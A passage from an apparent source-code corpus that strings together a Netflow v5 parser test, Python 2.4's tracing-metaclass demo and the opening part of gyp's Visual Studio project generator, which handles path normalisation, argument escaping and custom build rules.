x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x90\xa9\xb5\xfa\x90\xa9\x9c\xd0\x00\x8f\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\nz?\xac)\x03\xc8\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfaue\xb5\xfaue\xee\xa6\x00P\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\xb5\x05\xc0\xa8c\x9f\n\x00\x02\x01\x00i\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa{\xc7\xb5\xfa{\xc7\x00P\x86\xa9\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac2\xa5\x1b\xac)0\xbf\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x00\xfa\xb5\xfa\x9bZ\xb5\xfa\x9bZC\xf9\x17\xe0\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00'
def testPack(self):
pass
def testUnpack(self):
nf = Netflow5(self.sample_v5)
assert len(nf.data) == 29
#print repr(nfv5)
unittest.main()
| apache-2.0 |
scs/uclinux | user/python/python-2.4.4/Demo/metaclasses/Trace.py | 47 | 4133 | """Tracing metaclass.
XXX This is very much a work in progress.
"""
import types, sys
class TraceMetaClass:
"""Metaclass for tracing.
Classes defined using this metaclass have an automatic tracing
feature -- by setting the __trace_output__ instance (or class)
variable to a file object, trace messages about all calls are
written to the file. The trace formatting can be changed by
defining a suitable __trace_call__ method.
"""
__inited = 0
def __init__(self, name, bases, dict):
self.__name__ = name
self.__bases__ = bases
self.__dict = dict
# XXX Can't define __dict__, alas
self.__inited = 1
def __getattr__(self, name):
try:
return self.__dict[name]
except KeyError:
for base in self.__bases__:
try:
return base.__getattr__(name)
except AttributeError:
pass
raise AttributeError, name
def __setattr__(self, name, value):
if not self.__inited:
self.__dict__[name] = value
else:
self.__dict[name] = value
def __call__(self, *args, **kw):
inst = TracingInstance()
inst.__meta_init__(self)
try:
init = inst.__getattr__('__init__')
except AttributeError:
init = lambda: None
apply(init, args, kw)
return inst
__trace_output__ = None
class TracingInstance:
"""Helper class to represent an instance of a tracing class."""
def __trace_call__(self, fp, fmt, *args):
fp.write((fmt+'\n') % args)
def __meta_init__(self, klass):
self.__class = klass
def __getattr__(self, name):
# Invoked for any attr not in the instance's __dict__
try:
raw = self.__class.__getattr__(name)
except AttributeError:
raise AttributeError, name
if type(raw) != types.FunctionType:
return raw
# It's a function
fullname = self.__class.__name__ + "." + name
if not self.__trace_output__ or name == '__trace_call__':
return NotTracingWrapper(fullname, raw, self)
else:
return TracingWrapper(fullname, raw, self)
class NotTracingWrapper:
def __init__(self, name, func, inst):
self.__name__ = name
self.func = func
self.inst = inst
def __call__(self, *args, **kw):
return apply(self.func, (self.inst,) + args, kw)
class TracingWrapper(NotTracingWrapper):
def __call__(self, *args, **kw):
self.inst.__trace_call__(self.inst.__trace_output__,
"calling %s, inst=%s, args=%s, kw=%s",
self.__name__, self.inst, args, kw)
try:
rv = apply(self.func, (self.inst,) + args, kw)
except:
t, v, tb = sys.exc_info()
self.inst.__trace_call__(self.inst.__trace_output__,
"returning from %s with exception %s: %s",
self.__name__, t, v)
raise t, v, tb
else:
self.inst.__trace_call__(self.inst.__trace_output__,
"returning from %s with value %s",
self.__name__, rv)
return rv
Traced = TraceMetaClass('Traced', (), {'__trace_output__': None})
def _test():
global C, D
class C(Traced):
def __init__(self, x=0): self.x = x
def m1(self, x): self.x = x
def m2(self, y): return self.x + y
__trace_output__ = sys.stdout
class D(C):
def m2(self, y): print "D.m2(%r)" % (y,); return C.m2(self, y)
__trace_output__ = None
x = C(4321)
print x
print x.x
print x.m1(100)
print x.m1(10)
print x.m2(33)
print x.m1(5)
print x.m2(4000)
print x.x
print C.__init__
print C.m2
print D.__init__
print D.m2
y = D()
print y
print y.m1(10)
print y.m2(100)
print y.x
if __name__ == '__main__':
_test()
| gpl-2.0 |
alexcrichton/gyp | pylib/gyp/generator/msvs.py | 5 | 123465 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import copy
import ntpath
import os
import posixpath
import re
import subprocess
import sys
import gyp.common
import gyp.easy_xml as easy_xml
import gyp.MSVSNew as MSVSNew
import gyp.MSVSProject as MSVSProject
import gyp.MSVSSettings as MSVSSettings
import gyp.MSVSToolFile as MSVSToolFile
import gyp.MSVSUserFile as MSVSUserFile
import gyp.MSVSUtil as MSVSUtil
import gyp.MSVSVersion as MSVSVersion
from gyp.common import GypError
# TODO: Remove once bots are on 2.7, http://crbug.com/241769
def _import_OrderedDict():
import collections
try:
return collections.OrderedDict
except AttributeError:
import gyp.ordered_dict
return gyp.ordered_dict.OrderedDict
OrderedDict = _import_OrderedDict()
# Regular expression for validating Visual Studio GUIDs. If the GUID
# contains lowercase hex letters, MSVS will be fine. However,
# IncrediBuild BuildConsole will parse the solution file, but then
# silently skip building the target causing hard to track down errors.
# Note that this only happens with the BuildConsole, and does not occur
# if IncrediBuild is executed from inside Visual Studio. This regex
# validates that the string looks like a GUID with all uppercase hex
# letters.
VALID_MSVS_GUID_CHARS = re.compile('^[A-F0-9\-]+$')
generator_default_variables = {
'EXECUTABLE_PREFIX': '',
'EXECUTABLE_SUFFIX': '.exe',
'STATIC_LIB_PREFIX': '',
'SHARED_LIB_PREFIX': '',
'STATIC_LIB_SUFFIX': '.lib',
'SHARED_LIB_SUFFIX': '.dll',
'INTERMEDIATE_DIR': '$(IntDir)',
'SHARED_INTERMEDIATE_DIR': '$(OutDir)obj/global_intermediate',
'OS': 'win',
'PRODUCT_DIR': '$(OutDir)',
'LIB_DIR': '$(OutDir)lib',
'RULE_INPUT_ROOT': '$(InputName)',
'RULE_INPUT_DIRNAME': '$(InputDir)',
'RULE_INPUT_EXT': '$(InputExt)',
'RULE_INPUT_NAME': '$(InputFileName)',
'RULE_INPUT_PATH': '$(InputPath)',
'CONFIGURATION_NAME': '$(ConfigurationName)',
}
# The msvs specific sections that hold paths
generator_additional_path_sections = [
'msvs_cygwin_dirs',
'msvs_props',
]
generator_additional_non_configuration_keys = [
'msvs_cygwin_dirs',
'msvs_cygwin_shell',
'msvs_large_pdb',
'msvs_shard',
'msvs_external_builder',
'msvs_external_builder_out_dir',
'msvs_external_builder_build_cmd',
'msvs_external_builder_clean_cmd',
]
# List of precompiled header related keys.
precomp_keys = [
'msvs_precompiled_header',
'msvs_precompiled_source',
]
cached_username = None
cached_domain = None
# Based on http://code.activestate.com/recipes/576694/.
class OrderedSet(collections.MutableSet):
def __init__(self, iterable=None):
self.end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.map = {} # key --> [key, prev, next]
if iterable is not None:
self |= iterable
def __len__(self):
return len(self.map)
def discard(self, key):
if key in self.map:
key, prev, next = self.map.pop(key)
prev[2] = next
next[1] = prev
def __contains__(self, key):
return key in self.map
def add(self, key):
if key not in self.map:
end = self.end
curr = end[1]
curr[2] = end[1] = self.map[key] = [key, curr, end]
def update(self, iterable):
for i in iterable:
if i not in self:
self.add(i)
def __iter__(self):
end = self.end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
# TODO(gspencer): Switch the os.environ calls to be
# win32api.GetDomainName() and win32api.GetUserName() once the
# python version in depot_tools has been updated to work on Vista
# 64-bit.
def _GetDomainAndUserName():
if sys.platform not in ('win32', 'cygwin'):
return ('DOMAIN', 'USERNAME')
global cached_username
global cached_domain
if not cached_domain or not cached_username:
domain = os.environ.get('USERDOMAIN')
username = os.environ.get('USERNAME')
if not domain or not username:
call = subprocess.Popen(['net', 'config', 'Workstation'],
stdout=subprocess.PIPE)
config = call.communicate()[0]
username_re = re.compile('^User name\s+(\S+)', re.MULTILINE)
username_match = username_re.search(config)
if username_match:
username = username_match.group(1)
domain_re = re.compile('^Logon domain\s+(\S+)', re.MULTILINE)
domain_match = domain_re.search(config)
if domain_match:
domain = domain_match.group(1)
cached_domain = domain
cached_username = username
return (cached_domain, cached_username)
fixpath_prefix = None
def _NormalizedSource(source):
"""Normalize the path.
But not if that gets rid of a variable, as this may expand to something
larger than one directory.
Arguments:
    source: The path to be normalized.
Returns:
The normalized path.
"""
normalized = os.path.normpath(source)
if source.count('$') == normalized.count('$'):
source = normalized
return source
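# Illustrative examples (a sketch, not part of gyp; assumes the generator is
# running on Windows, where os.path.normpath collapses '..' and uses
# backslashes):
#
#   >>> _NormalizedSource('a/b/../c.cc')       # no variables, so normalize
#   'a\\c.cc'
#   >>> _NormalizedSource('$(IntDir)/../foo')  # normalizing would drop $(IntDir)
#   '$(IntDir)/../foo'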
def _FixPath(path):
"""Convert paths to a form that will make sense in a vcproj file.
Arguments:
path: The path to convert, may contain / etc.
Returns:
The path with all slashes made into backslashes.
"""
if fixpath_prefix and path and not os.path.isabs(path) and not path[0] == '$':
path = os.path.join(fixpath_prefix, path)
path = path.replace('/', '\\')
path = _NormalizedSource(path)
if path and path[-1] == '\\':
path = path[:-1]
return path
def _FixPaths(paths):
"""Fix each of the paths of the list."""
return [_FixPath(i) for i in paths]
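# Illustrative examples (a sketch with hypothetical inputs; assumes
# fixpath_prefix is still None, as it is at module load time):
#
#   >>> _FixPath('foo/bar.cc')
#   'foo\\bar.cc'
#   >>> _FixPaths(['a/b.c', '$(IntDir)/x.obj'])
#   ['a\\b.c', '$(IntDir)\\x.obj']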
def _ConvertSourcesToFilterHierarchy(sources, prefix=None, excluded=None,
list_excluded=True):
"""Converts a list split source file paths into a vcproj folder hierarchy.
Arguments:
    sources: A list of source file paths, each split into path components.
    prefix: A list of path components to prepend to each of the sources.
    excluded: A set of excluded files.
    list_excluded: Whether excluded files should be gathered into an
        '_excluded_files' folder in the result.
Returns:
A hierarchy of filenames and MSVSProject.Filter objects that matches the
layout of the source tree.
For example:
_ConvertSourcesToFilterHierarchy([['a', 'bob1.c'], ['b', 'bob2.c']],
prefix=['joe'])
-->
[MSVSProject.Filter('a', contents=['joe\\a\\bob1.c']),
MSVSProject.Filter('b', contents=['joe\\b\\bob2.c'])]
"""
if not prefix: prefix = []
result = []
excluded_result = []
# Gather files into the final result, excluded, or folders.
for s in sources:
if len(s) == 1:
filename = _NormalizedSource('\\'.join(prefix + s))
if filename in excluded:
excluded_result.append(filename)
else:
result.append(filename)
else:
contents = _ConvertSourcesToFilterHierarchy([s[1:]], prefix + [s[0]],
excluded=excluded,
list_excluded=list_excluded)
contents = MSVSProject.Filter(s[0], contents=contents)
result.append(contents)
# Add a folder for excluded files.
if excluded_result and list_excluded:
excluded_folder = MSVSProject.Filter('_excluded_files',
contents=excluded_result)
result.append(excluded_folder)
return result
def _ToolAppend(tools, tool_name, setting, value, only_if_unset=False):
if not value: return
_ToolSetOrAppend(tools, tool_name, setting, value, only_if_unset)
def _ToolSetOrAppend(tools, tool_name, setting, value, only_if_unset=False):
# TODO(bradnelson): ugly hack, fix this more generally!!!
if 'Directories' in setting or 'Dependencies' in setting:
if type(value) == str:
value = value.replace('/', '\\')
else:
value = [i.replace('/', '\\') for i in value]
if not tools.get(tool_name):
tools[tool_name] = dict()
tool = tools[tool_name]
if tool.get(setting):
if only_if_unset: return
if type(tool[setting]) == list and type(value) == list:
tool[setting] += value
else:
raise TypeError(
'Appending "%s" to a non-list setting "%s" for tool "%s" is '
'not allowed, previous value: %s' % (
value, setting, tool_name, str(tool[setting])))
else:
tool[setting] = value
def _ConfigPlatform(config_data):
return config_data.get('msvs_configuration_platform', 'Win32')
def _ConfigBaseName(config_name, platform_name):
if config_name.endswith('_' + platform_name):
return config_name[0:-len(platform_name) - 1]
else:
return config_name
def _ConfigFullName(config_name, config_data):
platform_name = _ConfigPlatform(config_data)
return '%s|%s' % (_ConfigBaseName(config_name, platform_name), platform_name)
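# Illustrative examples (a sketch with hypothetical configuration data):
#
#   >>> _ConfigFullName('Debug', {})
#   'Debug|Win32'
#   >>> _ConfigFullName('Release_x64', {'msvs_configuration_platform': 'x64'})
#   'Release|x64'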
def _BuildCommandLineForRuleRaw(spec, cmd, cygwin_shell, has_input_path,
quote_cmd, do_setup_env):
if [x for x in cmd if '$(InputDir)' in x]:
input_dir_preamble = (
'set INPUTDIR=$(InputDir)\n'
'set INPUTDIR=%INPUTDIR:$(ProjectDir)=%\n'
'set INPUTDIR=%INPUTDIR:~0,-1%\n'
)
else:
input_dir_preamble = ''
if cygwin_shell:
# Find path to cygwin.
cygwin_dir = _FixPath(spec.get('msvs_cygwin_dirs', ['.'])[0])
# Prepare command.
direct_cmd = cmd
direct_cmd = [i.replace('$(IntDir)',
'`cygpath -m "${INTDIR}"`') for i in direct_cmd]
direct_cmd = [i.replace('$(OutDir)',
'`cygpath -m "${OUTDIR}"`') for i in direct_cmd]
direct_cmd = [i.replace('$(InputDir)',
'`cygpath -m "${INPUTDIR}"`') for i in direct_cmd]
if has_input_path:
direct_cmd = [i.replace('$(InputPath)',
'`cygpath -m "${INPUTPATH}"`')
for i in direct_cmd]
direct_cmd = ['\\"%s\\"' % i.replace('"', '\\\\\\"') for i in direct_cmd]
# direct_cmd = gyp.common.EncodePOSIXShellList(direct_cmd)
direct_cmd = ' '.join(direct_cmd)
# TODO(quote): regularize quoting path names throughout the module
cmd = ''
if do_setup_env:
cmd += 'call "$(ProjectDir)%(cygwin_dir)s\\setup_env.bat" && '
cmd += 'set CYGWIN=nontsec&& '
if direct_cmd.find('NUMBER_OF_PROCESSORS') >= 0:
cmd += 'set /a NUMBER_OF_PROCESSORS_PLUS_1=%%NUMBER_OF_PROCESSORS%%+1&& '
if direct_cmd.find('INTDIR') >= 0:
cmd += 'set INTDIR=$(IntDir)&& '
if direct_cmd.find('OUTDIR') >= 0:
cmd += 'set OUTDIR=$(OutDir)&& '
if has_input_path and direct_cmd.find('INPUTPATH') >= 0:
cmd += 'set INPUTPATH=$(InputPath) && '
cmd += 'bash -c "%(cmd)s"'
cmd = cmd % {'cygwin_dir': cygwin_dir,
'cmd': direct_cmd}
return input_dir_preamble + cmd
else:
# Convert cat --> type to mimic unix.
if cmd[0] == 'cat':
command = ['type']
else:
command = [cmd[0].replace('/', '\\')]
# Add call before command to ensure that commands can be tied together one
# after the other without aborting in Incredibuild, since IB makes a bat
# file out of the raw command string, and some commands (like python) are
# actually batch files themselves.
command.insert(0, 'call')
# Fix the paths
# TODO(quote): This is a really ugly heuristic, and will miss path fixing
# for arguments like "--arg=path" or "/opt:path".
# If the argument starts with a slash or dash, it's probably a command line
# switch
arguments = [i if (i[:1] in "/-") else _FixPath(i) for i in cmd[1:]]
arguments = [i.replace('$(InputDir)', '%INPUTDIR%') for i in arguments]
arguments = [MSVSSettings.FixVCMacroSlashes(i) for i in arguments]
if quote_cmd:
# Support a mode for using cmd directly.
# Convert any paths to native form (first element is used directly).
# TODO(quote): regularize quoting path names throughout the module
arguments = ['"%s"' % i for i in arguments]
# Collapse into a single command.
return input_dir_preamble + ' '.join(command + arguments)
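# A rough sketch of what the non-cygwin branch above produces (hypothetical
# arguments; the exact result also depends on MSVSSettings.FixVCMacroSlashes
# and on fixpath_prefix, assumed None here): an action such as
# ['cat', 'foo/bar.txt'] with quote_cmd set becomes roughly
# 'call type "foo\bar.txt"' -- 'cat' is mapped to 'type', 'call' is prepended,
# path-like arguments are backslashed, and each argument is quoted.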
def _BuildCommandLineForRule(spec, rule, has_input_path, do_setup_env):
# Currently this weird argument munging is used to duplicate the way a
# python script would need to be run as part of the chrome tree.
# Eventually we should add some sort of rule_default option to set this
# per project. For now the behavior chrome needs is the default.
mcs = rule.get('msvs_cygwin_shell')
if mcs is None:
mcs = int(spec.get('msvs_cygwin_shell', 1))
elif isinstance(mcs, str):
mcs = int(mcs)
quote_cmd = int(rule.get('msvs_quote_cmd', 1))
return _BuildCommandLineForRuleRaw(spec, rule['action'], mcs, has_input_path,
quote_cmd, do_setup_env=do_setup_env)
def _AddActionStep(actions_dict, inputs, outputs, description, command):
"""Merge action into an existing list of actions.
Care must be taken so that actions which have overlapping inputs either don't
get assigned to the same input, or get collapsed into one.
Arguments:
actions_dict: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
inputs: list of inputs
outputs: list of outputs
description: description of the action
command: command line to execute
"""
# Require there to be at least one input (call sites will ensure this).
assert inputs
action = {
'inputs': inputs,
'outputs': outputs,
'description': description,
'command': command,
}
# Pick where to stick this action.
# While less than optimal in terms of build time, attach them to the first
# input for now.
chosen_input = inputs[0]
# Add it there.
if chosen_input not in actions_dict:
actions_dict[chosen_input] = []
actions_dict[chosen_input].append(action)
def _AddCustomBuildToolForMSVS(p, spec, primary_input,
inputs, outputs, description, cmd):
"""Add a custom build tool to execute something.
Arguments:
p: the target project
spec: the target project dict
primary_input: input file to attach the build tool to
inputs: list of inputs
outputs: list of outputs
description: description of the action
cmd: command line to execute
"""
inputs = _FixPaths(inputs)
outputs = _FixPaths(outputs)
tool = MSVSProject.Tool(
'VCCustomBuildTool',
{'Description': description,
'AdditionalDependencies': ';'.join(inputs),
'Outputs': ';'.join(outputs),
'CommandLine': cmd,
})
# Add to the properties of primary input for each config.
for config_name, c_data in spec['configurations'].iteritems():
p.AddFileConfig(_FixPath(primary_input),
_ConfigFullName(config_name, c_data), tools=[tool])
def _AddAccumulatedActionsToMSVS(p, spec, actions_dict):
"""Add actions accumulated into an actions_dict, merging as needed.
Arguments:
p: the target project
spec: the target project dict
actions_dict: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
"""
for primary_input in actions_dict:
inputs = OrderedSet()
outputs = OrderedSet()
descriptions = []
commands = []
for action in actions_dict[primary_input]:
inputs.update(OrderedSet(action['inputs']))
outputs.update(OrderedSet(action['outputs']))
descriptions.append(action['description'])
commands.append(action['command'])
# Add the custom build step for one input file.
description = ', and also '.join(descriptions)
command = '\r\n'.join(commands)
_AddCustomBuildToolForMSVS(p, spec,
primary_input=primary_input,
inputs=inputs,
outputs=outputs,
description=description,
cmd=command)
def _RuleExpandPath(path, input_file):
"""Given the input file to which a rule applied, string substitute a path.
Arguments:
path: a path to string expand
input_file: the file to which the rule applied.
Returns:
The string substituted path.
"""
path = path.replace('$(InputName)',
os.path.splitext(os.path.split(input_file)[1])[0])
path = path.replace('$(InputDir)', os.path.dirname(input_file))
path = path.replace('$(InputExt)',
os.path.splitext(os.path.split(input_file)[1])[1])
path = path.replace('$(InputFileName)', os.path.split(input_file)[1])
path = path.replace('$(InputPath)', input_file)
return path
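# Illustrative examples (a sketch with a hypothetical trigger file):
#
#   >>> _RuleExpandPath('$(InputName).h', 'dir/file.idl')
#   'file.h'
#   >>> _RuleExpandPath('gen/$(InputFileName).cc', 'dir/file.idl')
#   'gen/file.idl.cc'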
def _FindRuleTriggerFiles(rule, sources):
"""Find the list of files which a particular rule applies to.
Arguments:
rule: the rule in question
sources: the set of all known source files for this project
Returns:
The list of sources that trigger a particular rule.
"""
return rule.get('rule_sources', [])
def _RuleInputsAndOutputs(rule, trigger_file):
"""Find the inputs and outputs generated by a rule.
Arguments:
rule: the rule in question.
trigger_file: the main trigger for this rule.
Returns:
The pair of (inputs, outputs) involved in this rule.
"""
raw_inputs = _FixPaths(rule.get('inputs', []))
raw_outputs = _FixPaths(rule.get('outputs', []))
inputs = OrderedSet()
outputs = OrderedSet()
inputs.add(trigger_file)
for i in raw_inputs:
inputs.add(_RuleExpandPath(i, trigger_file))
for o in raw_outputs:
outputs.add(_RuleExpandPath(o, trigger_file))
return (inputs, outputs)
def _GenerateNativeRulesForMSVS(p, rules, output_dir, spec, options):
"""Generate a native rules file.
Arguments:
p: the target project
rules: the set of rules to include
output_dir: the directory in which the project/gyp resides
spec: the project dict
options: global generator options
"""
rules_filename = '%s%s.rules' % (spec['target_name'],
options.suffix)
rules_file = MSVSToolFile.Writer(os.path.join(output_dir, rules_filename),
spec['target_name'])
# Add each rule.
for r in rules:
rule_name = r['rule_name']
rule_ext = r['extension']
inputs = _FixPaths(r.get('inputs', []))
outputs = _FixPaths(r.get('outputs', []))
# Skip a rule with no action and no inputs.
if 'action' not in r and not r.get('rule_sources', []):
continue
cmd = _BuildCommandLineForRule(spec, r, has_input_path=True,
do_setup_env=True)
rules_file.AddCustomBuildRule(name=rule_name,
description=r.get('message', rule_name),
extensions=[rule_ext],
additional_dependencies=inputs,
outputs=outputs,
cmd=cmd)
# Write out rules file.
rules_file.WriteIfChanged()
# Add rules file to project.
p.AddToolFile(rules_filename)
def _Cygwinify(path):
path = path.replace('$(OutDir)', '$(OutDirCygwin)')
path = path.replace('$(IntDir)', '$(IntDirCygwin)')
return path
def _GenerateExternalRules(rules, output_dir, spec,
sources, options, actions_to_add):
"""Generate an external makefile to do a set of rules.
Arguments:
rules: the list of rules to include
output_dir: path containing project and gyp files
spec: project specification data
sources: set of sources known
options: global generator options
actions_to_add: The list of actions we will add to.
"""
filename = '%s_rules%s.mk' % (spec['target_name'], options.suffix)
mk_file = gyp.common.WriteOnDiff(os.path.join(output_dir, filename))
# Find cygwin style versions of some paths.
mk_file.write('OutDirCygwin:=$(shell cygpath -u "$(OutDir)")\n')
mk_file.write('IntDirCygwin:=$(shell cygpath -u "$(IntDir)")\n')
# Gather stuff needed to emit all: target.
all_inputs = OrderedSet()
all_outputs = OrderedSet()
all_output_dirs = OrderedSet()
first_outputs = []
for rule in rules:
trigger_files = _FindRuleTriggerFiles(rule, sources)
for tf in trigger_files:
inputs, outputs = _RuleInputsAndOutputs(rule, tf)
all_inputs.update(OrderedSet(inputs))
all_outputs.update(OrderedSet(outputs))
# Only use one target from each rule as the dependency for
# 'all' so we don't try to build each rule multiple times.
first_outputs.append(list(outputs)[0])
# Get the unique output directories for this rule.
output_dirs = [os.path.split(i)[0] for i in outputs]
for od in output_dirs:
all_output_dirs.add(od)
first_outputs_cyg = [_Cygwinify(i) for i in first_outputs]
# Write out all: target, including mkdir for each output directory.
mk_file.write('all: %s\n' % ' '.join(first_outputs_cyg))
for od in all_output_dirs:
if od:
mk_file.write('\tmkdir -p `cygpath -u "%s"`\n' % od)
mk_file.write('\n')
# Define how each output is generated.
for rule in rules:
trigger_files = _FindRuleTriggerFiles(rule, sources)
for tf in trigger_files:
# Get all the inputs and outputs for this rule for this trigger file.
inputs, outputs = _RuleInputsAndOutputs(rule, tf)
inputs = [_Cygwinify(i) for i in inputs]
outputs = [_Cygwinify(i) for i in outputs]
# Prepare the command line for this rule.
cmd = [_RuleExpandPath(c, tf) for c in rule['action']]
cmd = ['"%s"' % i for i in cmd]
cmd = ' '.join(cmd)
# Add it to the makefile.
mk_file.write('%s: %s\n' % (' '.join(outputs), ' '.join(inputs)))
mk_file.write('\t%s\n\n' % cmd)
# Close up the file.
mk_file.close()
# Add makefile to list of sources.
sources.add(filename)
# Add a build action to call makefile.
cmd = ['make',
'OutDir=$(OutDir)',
'IntDir=$(IntDir)',
'-j', '${NUMBER_OF_PROCESSORS_PLUS_1}',
'-f', filename]
cmd = _BuildCommandLineForRuleRaw(spec, cmd, True, False, True, True)
# Insert makefile as 0'th input, so it gets the action attached there,
# as this is easier to understand from in the IDE.
all_inputs = list(all_inputs)
all_inputs.insert(0, filename)
_AddActionStep(actions_to_add,
inputs=_FixPaths(all_inputs),
outputs=_FixPaths(all_outputs),
description='Running external rules for %s' %
spec['target_name'],
command=cmd)
def _EscapeEnvironmentVariableExpansion(s):
"""Escapes % characters.
Escapes any % characters so that Windows-style environment variable
expansions will leave them alone.
See http://connect.microsoft.com/VisualStudio/feedback/details/106127/cl-d-name-text-containing-percentage-characters-doesnt-compile
to understand why we have to do this.
Args:
s: The string to be escaped.
Returns:
The escaped string.
"""
s = s.replace('%', '%%')
return s
quote_replacer_regex = re.compile(r'(\\*)"')
def _EscapeCommandLineArgumentForMSVS(s):
"""Escapes a Windows command-line argument.
  The escaping is done so that the Win32 CommandLineToArgv function will turn
  the escaped result back into the original string.
See http://msdn.microsoft.com/en-us/library/17w5ykft.aspx
("Parsing C++ Command-Line Arguments") to understand why we have to do
this.
Args:
s: the string to be escaped.
Returns:
the escaped string.
"""
def _Replace(match):
# For a literal quote, CommandLineToArgv requires an odd number of
# backslashes preceding it, and it produces half as many literal backslashes
# (rounded down). So we need to produce 2n+1 backslashes.
return 2 * match.group(1) + '\\"'
# Escape all quotes so that they are interpreted literally.
s = quote_replacer_regex.sub(_Replace, s)
# Now add unescaped quotes so that any whitespace is interpreted literally.
s = '"' + s + '"'
return s
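# Illustrative example (a sketch; uses the Python 2 print statement, as used
# elsewhere in this file):
#
#   >>> print _EscapeCommandLineArgumentForMSVS('say "hi"')
#   "say \"hi\""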
delimiters_replacer_regex = re.compile(r'(\\*)([,;]+)')
def _EscapeVCProjCommandLineArgListItem(s):
"""Escapes command line arguments for MSVS.
The VCProj format stores string lists in a single string using commas and
semi-colons as separators, which must be quoted if they are to be
interpreted literally. However, command-line arguments may already have
quotes, and the VCProj parser is ignorant of the backslash escaping
convention used by CommandLineToArgv, so the command-line quotes and the
VCProj quotes may not be the same quotes. So to store a general
command-line argument in a VCProj list, we need to parse the existing
quoting according to VCProj's convention and quote any delimiters that are
not already quoted by that convention. The quotes that we add will also be
seen by CommandLineToArgv, so if backslashes precede them then we also have
to escape those backslashes according to the CommandLineToArgv
convention.
Args:
s: the string to be escaped.
Returns:
the escaped string.
"""
def _Replace(match):
# For a non-literal quote, CommandLineToArgv requires an even number of
# backslashes preceding it, and it produces half as many literal
# backslashes. So we need to produce 2n backslashes.
return 2 * match.group(1) + '"' + match.group(2) + '"'
segments = s.split('"')
# The unquoted segments are at the even-numbered indices.
for i in range(0, len(segments), 2):
segments[i] = delimiters_replacer_regex.sub(_Replace, segments[i])
# Concatenate back into a single string
s = '"'.join(segments)
if len(segments) % 2 == 0:
# String ends while still quoted according to VCProj's convention. This
# means the delimiter and the next list item that follow this one in the
# .vcproj file will be misinterpreted as part of this item. There is nothing
# we can do about this. Adding an extra quote would correct the problem in
# the VCProj but cause the same problem on the final command-line. Moving
    # the item to the end of the list does work, but that's only possible if
# there's only one such item. Let's just warn the user.
print >> sys.stderr, ('Warning: MSVS may misinterpret the odd number of ' +
'quotes in ' + s)
return s
def _EscapeCppDefineForMSVS(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = _EscapeEnvironmentVariableExpansion(s)
s = _EscapeCommandLineArgumentForMSVS(s)
s = _EscapeVCProjCommandLineArgListItem(s)
  # cl.exe replaces literal # characters with = in preprocessor definitions for
# some reason. Octal-encode to work around that.
s = s.replace('#', '\\%03o' % ord('#'))
return s
quote_replacer_regex2 = re.compile(r'(\\+)"')
def _EscapeCommandLineArgumentForMSBuild(s):
"""Escapes a Windows command-line argument for use by MSBuild."""
def _Replace(match):
return (len(match.group(1)) / 2 * 4) * '\\' + '\\"'
# Escape all quotes so that they are interpreted literally.
s = quote_replacer_regex2.sub(_Replace, s)
return s
def _EscapeMSBuildSpecialCharacters(s):
escape_dictionary = {
'%': '%25',
'$': '%24',
'@': '%40',
"'": '%27',
';': '%3B',
'?': '%3F',
'*': '%2A'
}
result = ''.join([escape_dictionary.get(c, c) for c in s])
return result
def _EscapeCppDefineForMSBuild(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = _EscapeEnvironmentVariableExpansion(s)
s = _EscapeCommandLineArgumentForMSBuild(s)
s = _EscapeMSBuildSpecialCharacters(s)
  # cl.exe replaces literal # characters with = in preprocessor definitions for
# some reason. Octal-encode to work around that.
s = s.replace('#', '\\%03o' % ord('#'))
return s
def _GenerateRulesForMSVS(p, output_dir, options, spec,
sources, excluded_sources,
actions_to_add):
"""Generate all the rules for a particular project.
Arguments:
p: the project
output_dir: directory to emit rules to
options: global options passed to the generator
spec: the specification for this project
sources: the set of all known source files in this project
excluded_sources: the set of sources excluded from normal processing
actions_to_add: deferred list of actions to add in
"""
rules = spec.get('rules', [])
rules_native = [r for r in rules if not int(r.get('msvs_external_rule', 0))]
rules_external = [r for r in rules if int(r.get('msvs_external_rule', 0))]
# Handle rules that use a native rules file.
if rules_native:
_GenerateNativeRulesForMSVS(p, rules_native, output_dir, spec, options)
# Handle external rules (non-native rules).
if rules_external:
_GenerateExternalRules(rules_external, output_dir, spec,
sources, options, actions_to_add)
_AdjustSourcesForRules(spec, rules, sources, excluded_sources)
def _AdjustSourcesForRules(spec, rules, sources, excluded_sources):
# Add outputs generated by each rule (if applicable).
for rule in rules:
# Done if not processing outputs as sources.
if int(rule.get('process_outputs_as_sources', False)):
# Add in the outputs from this rule.
trigger_files = _FindRuleTriggerFiles(rule, sources)
for trigger_file in trigger_files:
inputs, outputs = _RuleInputsAndOutputs(rule, trigger_file)
inputs = OrderedSet(_FixPaths(inputs))
outputs = OrderedSet(_FixPaths(outputs))
inputs.remove(_FixPath(trigger_file))
sources.update(inputs)
if not spec.get('msvs_external_builder'):
excluded_sources.update(inputs)
sources.update(outputs)
def _FilterActionsFromExcluded(excluded_sources, actions_to_add):
"""Take inputs with actions attached out of the list of exclusions.
Arguments:
excluded_sources: list of source files not to be built.
actions_to_add: dict of actions keyed on source file they're attached to.
Returns:
excluded_sources with files that have actions attached removed.
"""
must_keep = OrderedSet(_FixPaths(actions_to_add.keys()))
return [s for s in excluded_sources if s not in must_keep]
def _GetDefaultConfiguration(spec):
return spec['configurations'][spec['default_configuration']]
def _GetGuidOfProject(proj_path, spec):
"""Get the guid for the project.
Arguments:
proj_path: Path of the vcproj or vcxproj file to generate.
spec: The target dictionary containing the properties of the target.
Returns:
the guid.
Raises:
ValueError: if the specified GUID is invalid.
"""
# Pluck out the default configuration.
default_config = _GetDefaultConfiguration(spec)
# Decide the guid of the project.
guid = default_config.get('msvs_guid')
if guid:
